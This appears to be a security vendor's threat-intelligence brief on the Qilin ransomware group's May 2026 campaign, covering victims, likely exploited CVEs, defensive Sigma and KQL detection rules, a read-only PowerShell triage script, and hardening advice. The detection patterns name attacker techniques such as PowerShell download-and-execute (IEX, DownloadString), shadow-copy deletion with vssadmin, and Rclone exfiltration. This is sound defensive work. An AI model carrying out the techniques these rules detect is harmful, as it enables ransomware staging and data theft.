Aliases: Agenda, Qilin.B (sometimes referred to as Agenda based on code overlaps).
Operational Model: RaaS (Ransomware-as-a-Service). Qilin operates an affiliate program, allowing varied access vectors, but they provide a sophisticated Go-based encryption payload that supports intermittent encryption to speed up the process while evading detection.
Ransom Demands: Variable, typically ranging from $200,000 for mid-market entities to multi-million dollar demands for large enterprise or healthcare targets. They negotiate aggressively.
Initial Access Vectors: Historically known for phishing and exploiting exposed VPN services (FortiGate, SonicWall). However, current intel indicates a heavy pivot toward exploiting public-facing email appliances and management interfaces.
Tactics: Qilin employs double extortion (encryption + data theft). They are known to exfiltrate large volumes of data using tools like Rclone or WinSCP before detonating the encryption payload.
Average Dwell Time: 2–5 days. Recent activity suggests faster "smash-and-grab" operations, particularly when exploiting internet-facing vulnerabilities like CVE-2026-20131.
Current Campaign Analysis
Campaign Timeline: 2026-05-04 to 2026-05-07
Targeted Sectors: The current campaign shows a distinct lack of discrimination, targeting critical infrastructure and high-value verticals:
- Manufacturing: 3 Victims (Sylvania DE, Complastex BR, Lexus UA)
- Financial Services: 2 Victims (Panal Seguros PY, Foxstone Financial AU)
- Construction: 2 Victims (Asphalt Specialists US, Seagate Capital US)
- Healthcare & Public Sector: Laclinic-Montreux (CH), Le Maire de QUIBERON (FR)
Geographic Concentration: While global, there is a heavy emphasis on the US (5 victims) and Europe (DE, FR, IT, CH). Latin America (BR, PY) and Asia-Pacific (TH, AU) represent secondary targets.
Victim Profile: Qilin is targeting mid-to-large enterprises. The inclusion of "Le Maire de QUIBERON" (Public Sector) and "Laclinic-Montreux" (Elite Healthcare) suggests they are actively hunting high-worth data where the pressure to pay is highest.
CVE Correlation (Initial Access Vectors): The spike in victims correlates directly with the weaponization of recently added CISA KEV vulnerabilities. Based on the sectors targeted (Business Services, Tech), the following CVEs are likely primary access vectors:
- CVE-2026-20131 (Cisco Secure Firewall Management Center): Allows attackers to bypass authentication and execute code on the firewall management console. This is a "crown jewel" compromise, giving the actor control over the perimeter before internal pivoting.
- CVE-2025-52691 & CVE-2026-23760 (SmarterTools SmarterMail): Unrestricted file upload and authentication bypass. Given the targeting of Business Services (e.g., Law Office of Steven R Smith, Inox Market), it is highly probable Qilin affiliates are exploiting these email server flaws to gain a foothold.
- CVE-2023-21529 (Microsoft Exchange): A perennial favorite for ransomware actors to gain initial access or credential dumping.
Detection Engineering
The following detection rules are prioritized to catch the specific TTPs observed in this campaign (Email/Perimeter exploitation and PowerShell staging).
---
title: SmarterMail Unrestricted File Upload Exploit Attempt
description: Detects potential exploitation of CVE-2025-52691 in SmarterTools SmarterMail via suspicious file upload patterns.
references:
- https://cisa.gov/known-exploited-vulnerabilities-catalog
author: Security Arsenal Research
date: 2026/05/08
status: experimental
detection:
selection:
cs_method|contains: 'POST'
cs_uri_query|contains:
- 'Mondo'
- 'Services/Mail.asmx'
c_sc_content_type|contains: 'multipart/form-data'
filter:
sc_status: 200
condition: selection and filter
falsepositives:
- Legitimate administrators uploading attachments via web interface (rare)
level: critical
tags:
- attack.initial_access
- attack.web_application
- cve.2025.52691
---
title: Suspicious Cisco FMC Management Interface Access
id: 8f6a4c2b-1e9d-4a3f-8b7c-9d0e1f2a3b4c
description: Detects potential exploitation of CVE-2026-20131 on Cisco FMC via suspicious deserialization patterns or anomalous URI access.
references:
- https://cisa.gov/known-exploited-vulnerabilities-catalog
author: Security Arsenal Research
date: 2026/05/08
logsource:
category: web
detection:
selection_exploit:
cs_uri_path|contains:
- '/ui/fpmt'
- '/api/fmc_config/v1/domain'
cs_user_agent|re: '.*(python|curl|wget|metasploit).*'
selection_anomaly:
cs_method|contains: 'POST'
cs_uri_query|contains: '%7b' # Curly brace encoded in URL often indicative of payload injection
condition: 1 of selection*
falsepositives:
- Legitimate API calls from known management workstations
level: critical
tags:
- attack.initial_access
- attack.exploitation_for_privilege_escalation
- cve.2026.20131
---
title: Potential Qilin Ransomware Activity - PowerShell Staging
id: a1b2c3d4-5678-90ab-cdef-1234567890ab
description: Detects behavior consistent with Qilin ransomware pre-encryption staging, including massive PowerShell downloads and Rclone usage.
references:
- https://ransomware.live
author: Security Arsenal Research
date: 2026/05/08
logsource:
category: process_creation
product: windows
detection:
selection_pwsh_download:
Image|endswith: '\powershell.exe'
CommandLine|contains:
- 'Invoke-WebRequest'
- 'IEX'
- 'DownloadString'
CommandLine|contains|any:
- 'rclone'
- '7z'
- 'vssadmin'
selection_volume_shadow:
Image|endswith:
- '\vssadmin.exe'
- '\wbadmin.exe'
CommandLine|contains: 'delete'
condition: 1 of selection*
falsepositives:
- System administration tasks (rare for vssadmin delete)
level: high
tags:
- attack.impact
- attack.execution
**KQL (Microsoft Sentinel) - Lateral Movement & Staging Hunt**
This query identifies suspicious process chains often associated with Qilin's use of Cobalt Strike and manual movement.
kql
let TimeRange = 1d;
DeviceProcessEvents
| where Timestamp > ago(TimeRange)
// Look for specific tools used by Qilin affiliates
| where ProcessName in~ ("powershell.exe", "cmd.exe", "rclone.exe", "cobaltstrike.exe", "beacon.exe")
// Check for encoded commands or specific staging flags
| where ProcessCommandLine has any("-enc", "-encodedcommand", "-w hidden", "-nop", "bypass", "DownloadString")
// Correlate with network connections if available (often done via DeviceNetworkEvents)
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc
**PowerShell - Rapid Response Hardening & Discovery Script**
Run this on critical servers and workstations to identify pre-encryption artifacts.
powershell
# Qilin Ransomware Rapid Response Script
Write-Host "[*] Checking for recent scheduled task modifications (Potential Qilin persistence)..." -ForegroundColor Yellow
Get-ScheduledTask | Where-Object {$_.Date -gt (Get-Date).AddDays(-1)} | Select-Object TaskName, Date, Author, State
Write-Host "[*] Checking for unusual VSSAdmin/Shadow Copy deletions..." -ForegroundColor Yellow
$Events = Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4663; StartTime=(Get-Date).AddHours(-24)} -ErrorAction SilentlyContinue
$Events | Where-Object {$_.Message -like '*vssadmin*' -or $_.Message -like '*delete*'} | Select-Object TimeCreated, Id, Message
Write-Host "[*] Checking for active RDP connections (Non-local)..." -ForegroundColor Yellow
$query = "query session"
$sessionInfo = cmd /c $query
$sessionInfo
Write-Host "[*] Scanning for Qilin specific file extensions/extensions used in staging..." -ForegroundColor Yellow
$paths = @("C:\", "D:\", "E:\")
$patterns = @("*.enc_qilin", "*.README", "*.qilin", "rclone.conf")
foreach ($p in $paths) {
if (Test-Path $p) {
foreach ($pattern in $patterns) {
Get-ChildItem -Path $p -Filter $pattern -Recurse -ErrorAction SilentlyContinue | Select-Object FullName, CreationTime
}
}
}
---
Incident Response Priorities
T-Minus Detection Checklist (Pre-Encryption):
- Email Logs: Immediate review of SmarterMail/Exchange logs for POST anomalies from external IPs.
- Perimeter Alerts: Review firewall logs specifically for Cisco FMC management interface access logs. Any external IP accessing the FMC web UI is a critical indicator of compromise (CISA KEV CVE-2026-20131).
- Process Anomalies: Hunt for PowerShell processes spawned by IIS worker processes (
w3wp.exe) or with specific encoded arguments.
Critical Assets Prioritized for Exfiltration:
- Employee PII/HR Databases (High leverage for blackmail).
- Financial Reconciliation Files (Access to bank accounts).
- Client Lists / Source Code (IP Theft).
Containment Actions (Order of Urgency):
- Segregate Network: Isolate the Management Network (where FMC/Email servers reside) from the Production LAN immediately.
- Disable VPN/RDP: If RDP is required, enforce MFA and require bastion host access; otherwise, disable internet-facing RDP.
- Credential Reset: Force reset of domain admin credentials and service accounts if email servers are compromised.
Hardening Recommendations
Immediate (24 Hours):
- Patch Critical CVEs: Apply patches for Cisco FMC (CVE-2026-20131) and SmarterMail (CVE-2025-52691) immediately. These are active exploit pathways.
- Block Internet Access to Management Interfaces: Ensure FMC, vCenter, and Exchange admin panels are not accessible from the internet without strict VPN access and IP allow-listing.
- Disable Unauthenticated Services: Temporarily disable SMBv1 and RDP on critical servers if not strictly required.
Short-term (2 Weeks):
- Implement deception (Honeypots): Deploy fake admin credentials and "canary" SMB shares. Qilin actors often move laterally using valid credentials; detecting a canary trigger provides early warning.
- Network Segmentation: Enforce strict Zero Trust segmentation between Email gateways and the internal domain controllers.
- EDR Tuning: Update EDR policies to detect unsigned tools like Rclone and Mimikatz, even if executed via PowerShell (script block logging must be enabled).
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.